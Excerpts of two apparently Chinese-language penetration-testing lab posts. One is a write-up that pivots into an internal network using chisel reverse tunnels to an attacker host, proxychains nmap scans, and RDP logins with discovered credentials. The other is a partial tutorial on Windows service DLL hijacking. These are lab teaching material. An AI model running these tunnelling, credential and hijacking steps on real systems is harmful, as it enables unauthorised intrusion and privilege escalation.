發表文章

目前顯示的是有「dll」標籤的文章

Challenge 2 - Relia(8)

圖片
 Challenge 2 - Relia(8) 下一台選定內網的機器 .8 來進行下一步的目標 上一章已經在 .191 搭建了 chisel,直接透過 socks 掃描 172.16.xxx.7 TOP 100 Port 指令,└─$ proxychains4 -q nmap -vvv -sT --top-ports=100 -Pn 172.16.172.7 可以看到有開啟 80 Port HTTP nmap 掃描 80 Port 詳細資訊看看,發現是 WordPress 6.0.3 └─$ proxychains4 -q nmap -sCV -p 80 172.16.172.7 | tee nmap-80 再起一個 chisel 8090 Server,然後透過 .191 搭建 kali 8888 對應到 172.16.xxx.7 80 Port wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8090 R:8888:172.16.172.7:80" 開啟來看看 8888 /,看來伺服器轉址有寫死 80 Port 改搭建回 kali 80 Port,wmic process call create "C:\users\jim\desktop\chisel.exe client 192.168.45.221:8081 R:80:172.16.172.7:80" 再開一次 80 / 這一次有畫面了 點選相關連結發現有寫死 SNI "intranet.relia.com" 寫死 hosts 後可以正常開啟了 測試了幾組帳號密碼都沒有發現 後續測試 crackmapexec 發現 michelle@relia.com:NotMyPassword0k? 憑證有效 且 RDP 直接顯示 "Pwn3d!" RDP 測試登入,└─$ proxychains4 -q xfreerdp /u:'relia.com\michelle' /p:'NotMyPassword0k?' /v:172.16.172.7,直接進去了,桌面上直接放著 local.txt flag...

Windows 服務 DLL 劫持

圖片
 Windows 服務 DLL 劫持 前一篇中替換服務的二進位檔案是嘗試在 Windows 系統上進行權限提升的非常有效的方法 但往往不是這麼順利,因為權限的問題,所以進一步可以透過引用的 dll 檔案來做為另外一種選擇,這個往往是比較容易的方式,因為如果每個誠史都要自己編譯與準備相關的函式庫,那整個檔案與系統將會過大,所以幾乎都是調用內建的 dll 函式庫,上一篇覆蓋的是執行的 *.exe 檔案,這一篇大同小異,只是替換的檔案改成調用的 dll 函式庫 目前 Windows 版本上的標準 DLL 搜尋順序如下 1. The directory from which the application loaded. 2. The system directory. 3. The 16-bit system directory. 4. The Windows directory. 5. The current directory. 6. The directories that are listed in the PATH environment variable. 所以一般利用的方式是可以嘗試將惡意 DLL(帶有丟失 DLL 的名稱)放置在 DLL 搜尋順序的路徑中,以便它在二進位執行檔啟動時執行。 靶機 : 192.168.227.220,已知使用者帳號密碼 steve / securityIsNotAnOption++++++ 第一步 RDP 進去└─$ xfreerdp -v:192.168.227.220 -u:steve -p:securityIsNotAnOption++++++ 一樣先列舉服務 Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} 本次要利用的是 BetaService 一樣看一下該服務相關使用者權限,icacls .\Documents\BetaServ.exe,只有 (RX) 所以無法像前一篇一樣替換服務執行檔 我們的目標是識別 BetaService載入的所有 DLL並偵測遺失的 DLL。一旦我們獲得了服務二進位檔案使用的 DL...